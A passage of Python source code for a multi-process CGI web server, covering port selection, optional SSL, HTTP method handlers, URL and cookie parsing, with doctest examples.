maximum_number_of_processes=0, shared_data=None,
request_parameter_delimiter='\?',
file_size_stream_threshold_in_byte=8388608, # 8 MB
directory_listing=True, internal_redirects=None,
external_redirects=None,
known_big_web_mime_types=('application/x-shockwave-flash',),
**keywords
):
# #
'''
Sets root path of web server and all properties. Although the \
server thread will be started.
'''
self.__class__.instances.append(self)
# # # region properties
if self.internal_redirects is None:
self.internal_redirects = ()
if self.external_redirects is None:
self.external_redirects = ()
'''Indicates if new worker are currently allowed to spawn.'''
self.block_new_worker = False
'''Saves server runtime properties.'''
self.root = FileHandler(location=self.root)
self.thread_buffer = Buffer(queue=True)
'''Saves the number of running threads.'''
self.number_of_running_threads = 0
'''Saves the server thread service.'''
self.service = None
'''
Saves the number of running process forked by this server instance.
'''
self.number_of_running_processes = 0
if Platform.operating_system == 'windows':
self.maximum_number_of_processes = 1
elif not self.maximum_number_of_processes:
try:
self.maximum_number_of_processes = \
2 * multiprocessing.cpu_count()
except builtins.NotImplementedError:
self.maximum_number_of_processes = \
self.DEFAULT_NUMBER_OF_PROCESSES
'''
Saves informations how to define authentications in protected \
directories.
'''
if self.key_file:
self.key_file = FileHandler(location=self.key_file)
if not self.key_file.is_file():
raise __exception__(
'Given public key file path "%s" doesn\'t points to a '
'file.', self.key_file._path)
# # # endregions
return self._start_server_thread()
# # endregion
@JointPoint
# # python3.5
# # def _stop_graceful(
# # self: Self, number_of_running_workers: builtins.int
# # ) -> Self:
def _stop_graceful(self, number_of_running_workers):
# #
'''Waits until all child processes and threads have been terminated.'''
shown_number = 0
while number_of_running_workers > 0:
if(number_of_running_workers !=
self.number_of_running_threads +
builtins.len(multiprocessing.active_children())):
number_of_running_workers = \
self.number_of_running_threads + \
builtins.len(multiprocessing.active_children())
if(shown_number != number_of_running_workers and
number_of_running_workers > 0):
__logger__.info(
'Waiting for %d running workers (%d threads and '
'%d processes).', number_of_running_workers,
self.number_of_running_threads,
builtins.len(multiprocessing.active_children()))
shown_number = number_of_running_workers
time.sleep(2)
__logger__.info('Shutting down web server.')
self.__class__.instances.remove(self)
return self
@JointPoint
# # python3.5 def _start_server_thread(self: Self) -> Self:
def _start_server_thread(self):
'''
Starts the server's request handler instance and listens for \
shutting-down-command.
'''
if self.port:
self._start_with_static_port()
else:
self._start_with_dynamic_port()
self._log_server_status()
if not __test_mode__ and self.stop_order:
self.wait_for_order()
return self
@JointPoint
# # python3.5 def _log_server_status(self: Self) -> Self:
def _log_server_status(self):
'''Prints some information about the way the server was started.'''
determine_ip_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = socket.gethostbyname(socket.gethostname())
if self.host_name == '':
try:
determine_ip_socket.connect(self.DETERMINE_IP_SOCKET)
# # python3.5
# # except(
# # builtins.BrokenPipeError, socket.gaierror, socket.herror,
# # socket.timeout, socket.error
# # ) as exception:
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
):
# #
pass
else:
ip = determine_ip_socket.getsockname()[0]
finally:
try:
determine_ip_socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
determine_ip_socket.close()
__logger__.info(
'Web server is starting%s, listens at port "%d" and webroot is '
'"%s". Currently reachable ip is "%s". Maximum parallel processes '
'is limited to %d.', (
' a secure connection with public key "%s" ' %
self.key_file._path
) if self.key_file else '', self.port, self.root._path,
ip, self.maximum_number_of_processes)
return self
@JointPoint
# # python3.5 def _start_with_dynamic_port(self: Self) -> Self:
def _start_with_dynamic_port(self):
'''Searches for the highest free port for listing.'''
ports = [
80, 8080, 8008, 8090, 8280, 8887, 9080, 16080, 3128, 4567,
5000, 4711, 443, 5001, 5104, 5800, 8243, 8888]
if self.key_file:
ports = [443] + ports
ports += builtins.list(builtins.set(
builtins.range(self.HIGHEST_AVAILABLE_PORT)
).difference(ports))
if not __test_mode__:
for port in ports:
try:
self._initialize_server_thread(port)
except socket.error:
if port == self.HIGHEST_AVAILABLE_PORT:
# # python3.5
# # raise __exception__(
# # 'No port is available to run the web-server '
# # 'with given rights.'
# # ) from None
raise __exception__(
'No port is available to run the web-server '
'with given rights.')
# #
else:
self.port = port
return self
return self
@JointPoint
# # python3.5 def _start_with_static_port(self: Self) -> Self:
def _start_with_static_port(self):
'''Starts the server listing on the given port, if it is free.'''
if not __test_mode__:
try:
self._initialize_server_thread(port=self.port)
except socket.error:
# # python3.5
# # raise __exception__(
# # "Port %d isn't available to run the web-server with "
# # 'given rights.', self.port
# # ) from None
raise __exception__(
"Port %d isn't available to run the web-server with "
'given rights.', self.port)
# #
return self
@JointPoint
# # python3.5
# # def _serve_service_forever_exception_catcher(self: Self) -> Self:
def _serve_service_forever_exception_catcher(self):
# #
'''
This method wraps the python's native server "serve_forever()" \
method to handle incoming exceptions in a separat thread.
'''
try:
return self.service.serve_forever()
# # python3.5
# # except builtins.ValueError as exception:
# # __logger__.warning(
# # '%s: %s', exception.__class__.__name__,
# # builtins.str(exception))
except socket.error as exception:
__logger__.warning(
'%s: %s', exception.__class__.__name__,
convert_to_unicode(exception))
# #
return self
@JointPoint
# # python3.5
# # def _initialize_server_thread(
# # self: Self, port: builtins.int
# # ) -> Self:
def _initialize_server_thread(self, port):
# #
'''Initializes a new request-handler and starts its own thread.'''
self.service = MultiProcessingHTTPServer(
(self.host_name, port), CGIHTTPRequestHandler)
if self.key_file:
self.service.socket = ssl.wrap_socket(
self.service.socket, certfile=self.key_file._path,
server_side=True)
self.service.web = self
# # python3.5
# # threading.Thread(
# # target=self._serve_service_forever_exception_catcher,
# # daemon=True
# # ).start()
server_thread = threading.Thread(
target=self._serve_service_forever_exception_catcher)
server_thread.daemon = True
server_thread.start()
# #
return self
# # endregion
# endregion
# # python3.5
# # class CGIHTTPRequestHandler(server.CGIHTTPRequestHandler):
class CGIHTTPRequestHandler(
cgi_http_server.CGIHTTPRequestHandler, builtins.object
):
# #
'''
A small request-handler dealing with incoming file requests. It can \
directly send static files back to client or run dynamic scripts and \
give the output back to client.
'''
# region dynamic methods
# # region public
# # # region special
@JointPoint
# # python3.5
# # def __init__(
# # self, request_socket: socket.socket,
# # request_address: builtins.tuple,
# # server: MultiProcessingHTTPServer, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> None:
# # '''
# # This method calls is parent. It's necessary to make some class
# # properties instance properties.
# # '''
def __init__(
self, request_socket, request_address, server, *arguments,
**keywords
):
# #
'''
Initializes all used properties and calls the super method.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server
... ) # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
# # # region properties
'''Saves current server instance.'''
self.server = server
'''Properties defined by incoming request.'''
self.host = ''
self.uri = ''
self.external_uri = ''
self.parameter = ''
self.get = {}
self.data = {}
self.cookie = {}
self.type = ''
self.external_type = ''
self.data_type = ''
'''Saves the last started worker thread instance.'''
self.last_running_worker = None
'''
Consists the explicit requested file name (like python's native \
"self.file") coming from client.
'''
self.requested_file_name = ''
'''References the corresponding file handler to requested file name.'''
self.requested_file = None
'''
Defines whether the handler has decided to run a python module or \
an external script.
'''
self.load_module = False
'''
Defines arguments given to a requested file which is running by \
the server.
'''
self.request_arguments = []
'''Indicates if an answer is expected from the requested file.'''
self.respond = False
self.response_sent = self.headers_ended = self.content_type_sent = \
self.content_length_sent = False
# # python3.5
# # '''Saves the error message format.'''
# # self.error_message_format = (
# # '<!doctype html>\n'
# # '<html lang="en">\n'
# # ' <head>\n'
# # ' <meta charset="{charset}">\n'
# # ' <meta name="robots" content="noindex, follow" />\n'
# # ' <meta name="viewport" content="width=device-width, '
# # 'initial-scale=1.0" />\n'
# # ' <title>Error response</title>\n'
# # ' </head>\n'
# # ' <body>\n'
# # ' <h1>Error response</h1>\n'
# # ' <p>\n'
# # ' Error code '
# # '<span style="color: red">%(code)d</span>.\n'
# # ' </p>\n'
# # ' <p>Message:</p>\n'
# # ' <pre>%(message)s.</pre>\n'
# # ' <p>Error code explanation: %(code)s</p>\n'
# # ' <p>%(explain)s.</p>\n'
# # ' </body>\n'
# # '</html>').format(charset=self.server.web.encoding.replace(
# # '_', '-'))
'''
Saves the error message format. NOTE: Has to be a native \
string to avoid encoding errors in python's native underlying \
request handler logic.
'''
self.error_message_format = convert_to_string(
'<!doctype html>\n'
'<html lang="en">\n'
' <head>\n'
' <meta charset="{charset}">\n'
' <meta name="robots" content="noindex, follow" />\n'
' <meta name="viewport" content="width=device-width, '
'initial-scale=1.0" />\n'
' <title>Error response</title>\n'
' </head>\n'
' <body>\n'
' <h1>Error response</h1>\n'
' <p>\n'
' Error code '
'<span style="color: red">%(code)d</span>.\n'
' </p>\n'
' <p>Message:</p>\n'
' <pre>%(message)s.</pre>\n'
' <p>Error code explanation: %(code)s</p>\n'
' <p>%(explain)s.</p>\n'
' </body>\n'
'</html>').format(charset=self.server.web.encoding.replace(
'_', '-'))
# #
'''Saves the error content type header.'''
# # python3.5
# # self.error_content_type = 'text/html; charset=%s' % \
# # self.server.web.encoding.replace('_', '-')
self.error_content_type = convert_to_string(
'text/html; charset=%s' % self.server.web.encoding.replace(
'_', '-'))
# #
'''
Saves the self describing server version string. This string is \
included in every response.
'''
self.server_version = '{program} {version} {status}'.format(
program=String(__module_name__).camel_case_capitalize.content,
version=__version__, status=__status__)
'''Saves gziped encoded output.'''
self._encoded_output = None
'''
Points to location which is authoritative to be reachable from \
requested destination.
'''
self._authentication_location = None
# # # endregion
if not __test_mode__:
'''Take this method via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(request_socket, request_address, server, *arguments, **keywords)
@JointPoint
# # python3.5 def __repr__(self: Self) -> builtins.str:
def __repr__(self):
'''
Invokes if this object should describe itself by a string.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> repr(CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server
... )) # doctest: +SKIP
'Object of "CGIHTTPRequestHandler" with request uri "" and para...'
'''
return 'Object of "{class_name}" with request uri "{url}" and '\
'parameter "{parameter}".'.format(
class_name=self.__class__.__name__, url=self.uri,
parameter=self.parameter)
# # # endregion
# # # region event
@JointPoint
# # python3.5 def do_GET(self: Self) -> Self:
def do_GET(self):
'''
Is triggered if an incoming get request is detected. Decides if \
request is valid and static or dynamic. It also through an \
exception and sends an http-error if request isn't valid.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
>>> handler.path = ''
>>> handler.server.web.directory_listing = False
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.server.web.authentication = True
>>> handler.server.web.authentication_handler = (
... lambda login_data, request_handler: (False, None))
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('key: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('key', 'value')
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String(
... 'Authorization: Basic ' +
... base64_encode('hans:hans')
... ), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header(
... 'Authorization',
... 'Basic ' + base64_encode(b'hans:hans').decode(
... handler.server.web.encoding))
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('authorization: value'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('authorization', 'value')
>>> # #
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
>>> handler.path = '/not_existing_file'
>>> handler.server.web.request_whitelist = '*:/not_existing_file',
>>> handler.server.web.authentication_handler = (
... lambda login_data, request_handler: (True, None))
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/not_existin...
>>> file = FileHandler(__test_folder__.path + 'do_GET')
>>> file.content = ''
>>> handler.path = '/' + file.name
>>> handler.server.web.request_whitelist = '*:/%s' % file.name,
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.path = 'not_in_whitlist'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "not_in_whitl...
>>> handler.server.web.request_whitelist = '*:/%s' % file.name,
>>> handler.path = '/do_GET'
>>> handler.server.web.external_redirects = (('GET:.*', ''),)
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.server.web.request_whitelist = '*:/%s' % file.name,
>>> handler.path = '/do_GET'
>>> handler.server.web.external_redirects = (('POST:.*', ''),)
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.server.web.external_redirects = (
... ('*:(.+)', '/\\\\1/'),)
>>> handler.path = '/do_GET'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET" ...
>>> handler.server.web.internal_redirects = (
... ('*:(.+)', '-:\\\\1/'),)
>>> handler.path = '/do_GET'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET/" ...
>>> handler.path = __test_folder__.path
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/..." ...
>>> handler.server.web.internal_redirects = (
... ('*:(.+)', 'PUT:\\\\1/'),)
>>> handler.path = '/do_GET'
>>> handler.do_GET() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/do_GET/" ...
'''
self.external_type = self.type = self.type if self.type else 'get'
self.create_environment_variables()
authentication = self._is_authenticated()
if authentication[0]:
valid_request = self._is_valid_request()
if valid_request:
if self._handle_redirect():
return self
if self.path:
if self._is_valid_reference():
return self._set_dynamic_or_static_get(
file_name=self.path)
elif self._default_get():
return self
return self._send_no_file_error(valid_request)
return self._send_no_authorization_error(output=authentication[1])
@JointPoint
# # python3.5 def do_POST(self: Self) -> Self:
def do_POST(self):
'''
Is triggered if a post request is coming.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_POST() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_PATCH(self: Self) -> Self:
def do_PATCH(self):
'''
Is triggered if a patch request is coming.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_PATCH() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_DELETE(self: Self) -> Self:
def do_DELETE(self):
'''
Is triggered if a delete request is coming.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_DELETE() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_PUT(self: Self) -> Self:
def do_PUT(self):
'''
Is triggered if a put request is coming.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_PUT() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
return self._do_data_request(type=inspect.stack()[0][3])
@JointPoint
# # python3.5 def do_HEAD(self: Self) -> Self:
def do_HEAD(self):
'''
Is triggered if a head request is coming.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('test: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('test', 'hans')
>>> # #
>>> handler.do_HEAD() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "/" and param...
'''
self.type = inspect.stack()[0][3][builtins.len('do_'):].lower()
return self.do_GET()
# # # endregion
@JointPoint
# # python3.5
# # def parse_url(self: Self, url=None, strict=False) -> builtins.tuple:
def parse_url(self, url=None, strict=False):
# #
'''
This method provides an easy way to split a http request string \
into its components.
**url** - URL to parse.
**strict** - Determines whether to parse url with no error \
tolerance. Incorrect parameters will be omitted.
Returns a tuple containing of the parse object and a dictionary \
containing get parameter.
>>> sys_argv_backup = copy(sys.argv)
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.request_parameter_delimiter = '?'
>>> sys.argv = sys.argv[:1]
>>> handler.parse_url()
(None, {})
>>> sys.argv[1:] = ['hans']
>>> handler.parse_url() # doctest: +ELLIPSIS
(ParseResult(...'hans'...), {})
>>> sys.argv[1:] = ['?hans=peter']
>>> handler.parse_url() # doctest: +ELLIPSIS
(ParseResult(..., {'hans': 'peter'})
>>> sys.argv[1:] = ['?hans=peter&s']
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> handler.parse_url(strict=True) # doctest: +ELLIPSIS
(ParseResult(...'hans=peter&s'...})
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'... "?hans=peter&s" is not a valid get query string.\\n'
>>> sys.argv = sys_argv_backup
'''
if url is None and builtins.len(sys.argv) > 1:
url = sys.argv[1]
if url:
# # python3.5
# # url = regularExpression.compile(
# # self.server.web.request_parameter_delimiter
# # ).sub('?', url, 1)
# # parse_result = parse_url(url)
url = regularExpression.compile(
self.server.web.request_parameter_delimiter
).sub('?', convert_to_unicode(url), 1)
parse_result = parse_url(convert_to_string(url))
# #
get = {}
if parse_result.query:
try:
# # python3.5
# # get = parse_url_query(
# # qs=parse_result.query, keep_blank_values=True,
# # strict_parsing=strict,
# # encoding=self.server.web.encoding,
# # errors='replace')
get = parse_url_query(
qs=parse_result.query, keep_blank_values=True,
strict_parsing=strict)
# #
except builtins.ValueError:
__logger__.info(
'"%s" is not a valid get query string.', url)
for key, value in get.items():
# # python3.5
# # get[key] = value[0]
get[convert_to_unicode(key)] = convert_to_unicode(
value[0])
# #
return parse_result, get
return None, {}
@JointPoint
# # python3.5
# # def send_response(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> Self:
def send_response(self, *arguments, **keywords):
# #
'''
Send the given response code to client if no response code was \
sent yet.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server
... ).send_response() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and parame...
'''
if not (self.response_sent or __test_mode__):
if builtins.len(arguments) > 1 and builtins.isinstance(
arguments[1], builtins.str
):
arguments = builtins.list(arguments)
arguments[1] = arguments[1].replace('\n', '\\n')
arguments = builtins.tuple(arguments)
self.response_sent = True
'''Take this method via introspection.'''
builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
return self
@JointPoint
# # python3.5
# # def send_error(
# # self: Self, code: builtins.int, message: builtins.str,
# # *arguments: builtins.object, **keywords: builtins.object
# # ) -> Self:
def send_error(self, code, message, *arguments, **keywords):
# #
'''
Send the given error to client if no response code was sent yet.
**code** - Error code to send.
'''
if not (self.response_sent or __test_mode__):
self.content_type_sent = self.content_length_sent = True
self.send_response(code)
# # python3.5 pass
message = convert_to_string(message)
'''Take this method via introspection.'''
builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(code, message, *arguments, **keywords)
return self
@JointPoint
# # python3.5
# # def list_directory(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> Self:
def list_directory(self, *arguments, **keywords):
# #
'''
Generates a simple html web page listing requested directory \
content.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> handler.path = '/'
>>> handler.requested_file = FileHandler()
>>> handler.list_directory() # doctest: +ELLIPSIS
Object of "CGIHTTPRequestHandler" with request uri "" and param...
'''
path_backup = self.path
self.path = self.requested_file.path[builtins.len(
self.server.web.root.path
) - builtins.len(os.sep):]
'''Take this method via introspection.'''
if not __test_mode__:
file_handler = builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(self.requested_file._path, *arguments, **keywords)
self._send_output(output=file_handler)
self.path = path_backup
return self
@JointPoint
# # python3.5
# # def end_headers(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> Self:
def end_headers(self, *arguments, **keywords):
# #
'''Finishes all sent headers by a trailing new empty line.'''
if not (self.headers_ended or __test_mode__):
self.headers_ended = True
'''Take this method via introspection.'''
builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
return self
@JointPoint
# # python3.5
# # def send_static_file_cache_header(
# # self: Self, timestamp=time.time(), response_code=200,
# # cache_control_header='public, max-age=0', expire_time_in_seconds=0
# # ) -> Self:
def send_static_file_cache_header(
self, timestamp=time.time(), response_code=200,
cache_control_header='public, max-age=0', expire_time_in_seconds=0
):
# #
'''
Response a static file-request header.
**timestamp** - Timestamp to use as last modified \
time.
**response_code** - Response code to send if not sent yet.
**cache_control_header** - Cache control header string.
**expire_time_in_seconds** - Additional time to current timestamp \
for expires header.
'''
if not __test_mode__:
self.send_response(response_code).send_header(
'Cache-Control', cache_control_header)
self.send_header('Last-Modified', self.date_time_string(timestamp))
self.send_header('Expires', self.date_time_string(
timestamp + expire_time_in_seconds))
return self
@JointPoint
# # python3.5
# # def get_cookie(
# # self: Self, name=None
# # ) -> (builtins.str, cookies.SimpleCookie, builtins.type(None)):
def get_cookie(self, name=None):
# #
'''
Retrieves a http cookie.
**name** - If provided only the matching value will be returned \
instead of the whole cookie object.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('hans: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('hans', 'hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: hans=hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'hans=hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans='hans'>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: ha/ns=hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'ha/ns=hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans='hans'>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...WARNING... - Invalid cookie detected "ha/ns=hans". ...'
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: hans'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'hans')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: >
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
''
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: hans='), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'hans=')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans=''>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
''
>>> # # python2.7
>>> if sys.version_info.major < 3:
... handler.headers = handler.MessageClass(
... String('Cookie: h/a//ns////=ha/ns'), seekable=False)
... else:
... handler.headers = handler.MessageClass()
... handler.headers.add_header('Cookie', 'h/a//ns////=ha/ns')
>>> # #
>>> handler.get_cookie() # doctest: +ELLIPSIS
<SimpleCookie: hans='ha/ns'>
>>> __test_buffer__.clear() # doctest: +ELLIPSIS
'...WARNING... - Invalid cookie detected ...'
'''
# # python3.5 if 'cookie' in self.headers:
if self.headers.get('cookie'):
cookie = cookies.SimpleCookie()
# # python3.5
# # cookie_content = self.headers.get('cookie')
cookie_content = convert_to_unicode(self.headers.get('cookie'))
# #
while True:
try:
# # python3.5
# # cookie.load(cookie_content)
cookie.load(convert_to_string(cookie_content))
# #
except cookies.CookieError as exception:
new_cookie_content = regularExpression.compile(
'([^=]*)/+([^=]*=[^;]*(?:;|$))'
).sub('\\1\\2', cookie_content)
if cookie_content == new_cookie_content:
# # python3.5
# # __logger__.critical(
# # 'Invalid cookie detected "%s". %s: %s',
# # cookie_content,
# # exception.__class__.__name__,
# # builtins.str(exception))
__logger__.critical(
'Invalid cookie detected "%s". %s: %s',
cookie_content, exception.__class__.__name__,
convert_to_unicode(exception))
# #
return None
else:
# # python3.5
# # __logger__.warning(
# # 'Invalid cookie detected "%s". %s: %s. Trying '
# # '"%s".', cookie_content,
# # exception.__class__.__name__,
# # builtins.str(exception), new_cookie_content)
__logger__.warning(
'Invalid cookie detected "%s". %s: %s. '
'Trying "%s" .', cookie_content,
exception.__class__.__name__,
convert_to_unicode(exception),
new_cookie_content)
# #
cookie_content = new_cookie_content
else:
break
# # python3.5
# # return cookie[
# # name
# # ].value if name and name in cookie else cookie
return convert_to_unicode(
cookie[name].value
) if name and name in cookie else cookie
# #
return None
@JointPoint
# # python3.5
# # def send_cookie(
# # self: Self,
# # cookie: (cookies.SimpleCookie, builtins.str, builtins.dict),
# # header='Set-Cookie', maximum_age_in_seconds=60 * 60 * 24 * 7,
# # version=1, domain='', secure=False, httponly=False, comment='',
# # path='/', response_code=200
# # ) -> Self:
def send_cookie(
self, cookie, header='Set-Cookie',
maximum_age_in_seconds=60 * 60 * 24 * 7, version=1, domain='',
secure=False, httponly=False, comment='', path='/',
response_code=200
):
# #
'''
Sends a http cookie.
**cookie** - Cookie object, dictionary or string.
**header** - HTTP Header to use.
**maximum_age_in_seconds** - Maximum age of given cookie. Default \
is 7 days.
**version** - Given cookie version.
**domain** - The domain the cookie should bounded \
to.
**secure** - Indicates whether only secure \
connections should be associated \
with given cookie.
**httponly** - Disables JavaScript access to given \
cookie.
**comment** - A comment provided for given cookie.
**path** - Web path the cookie should bounded to.
**response_code** - Response code to send if not sent yet.
Examples:
>>> server = MultiProcessingHTTPServer()
>>> server.web = Web(__test_folder__)
>>> handler = CGIHTTPRequestHandler(
... socket.socket(socket.AF_INET, socket.SOCK_STREAM),
... ('127.0.0.1', 12345), server)
